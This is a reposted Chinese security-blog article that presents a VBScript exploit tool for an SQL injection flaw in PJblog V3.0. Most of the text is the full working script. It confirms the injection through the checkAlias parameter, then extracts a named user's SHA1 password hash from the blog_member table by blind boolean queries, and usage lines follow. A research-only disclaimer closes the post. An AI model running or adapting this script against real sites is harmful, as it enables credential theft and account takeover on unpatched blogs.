PJblog V3.0 0day Vbs版漏洞利用工具 's

admin
admin
admin
141216
文章
117
评论
2017年4月30日09:00:09评论364 views字数 1818阅读6分3秒阅读模式
摘要

来源:WEB安全手册感谢雨中风铃的投递漏洞具体细节请看http://0kee.com/read.php?tid-908.html,我的电脑上没有安装php,就编写了一个Vbs版漏洞利用工具,具体代码如下:

来源:WEB安全手册

感谢雨中风铃的投递

漏洞具体细节请看http://0kee.com/read.php?tid-908.html,我的电脑上没有安装php,就编写了一个Vbs版漏洞利用工具,具体代码如下:

If WScript.Arguments.Count <> 2 Then         WScript.Echo "Usage: Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名"         WScript.Echo "Example: Cscript.exe Exp.vbs http://www.pjhome.net puterjam"         WScript.Quit End If  attackUrl = WScript.Arguments(0) attackUser = WScript.Arguments(1) attackUrl = Replace(attackUrl,"/","/") If Right(attackUrl , 1) <> "/" Then         attackUrl = attackUrl & "/" End If SHA1Charset = "0123456789ABCDEFJ" strHoleUrl = attackUrl & "action.asp?action=checkAlias&cname=0kee"""  If IsSuccess(strHoleUrl & "or ""1""=""1") And Not IsSuccess(strHoleUrl & "and ""1""=""2") Then         WScript.Echo "恭喜!存在漏洞" Else         WScript.Echo "没有检测到漏洞"         WScript.Quit End If  For n=1 To 40         For i=1 To 17                 strInject = strHoleUrl & " Or 0<(Select Count(*) From blog_member Where mem_name='" & attackUser & "' And mem_password>='" & strResult & Mid(SHA1Charset, i, 1) & "') And ""1""=""1"                 If Not IsSuccess(strInject) Then                         strResult = strResult & Mid(SHA1Charset, i-1, 1)                         Exit For                 End If                 strPrint = chr(13) & "Password(SHA1): " & strResult & Mid(SHA1Charset, i, 1)                 WScript.StdOut.Write strPrint         Next Next WScript.Echo Chr(13) & Chr (10) & "Done!"  Function PostData(PostUrl)  Dim Http  Set Http = CreateObject("msxml2.serverXMLHTTP")  With Http   .Open "GET",PostUrl,False   .Send ()   PostData = .ResponseBody  End With  Set Http = Nothing  PostData =bytes2BSTR(PostData) End Function  Function bytes2BSTR(vIn)  Dim strReturn  Dim I, ThisCharCode, NextCharCode  strReturn = ""  For I = 1 To LenB(vIn)   ThisCharCode = AscB(MidB(vIn, I, 1))   If ThisCharCode < &H80 Then    strReturn = strReturn & Chr(ThisCharCode)   Else    NextCharCode = AscB(MidB(vIn, I + 1, 1))    strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))    I = I + 1   End If  Next  bytes2BSTR = strReturn End Function  Function IsSuccess(PostUrl)  strData = PostData(PostUrl) 'Wscript.Echo strData if InStr(strData,"check_error") >0 then         IsSuccess = True Else         IsSuccess = False End If 'Wscript.Sleep 500 '让系统休息一下 End Function

用法:Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名

截图如下:

PJblog V3.0 0day Vbs版漏洞利用工具 's

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年4月30日09:00:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   PJblog V3.0 0day Vbs版漏洞利用工具 'shttp://cn-sec.com/archives/44695.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息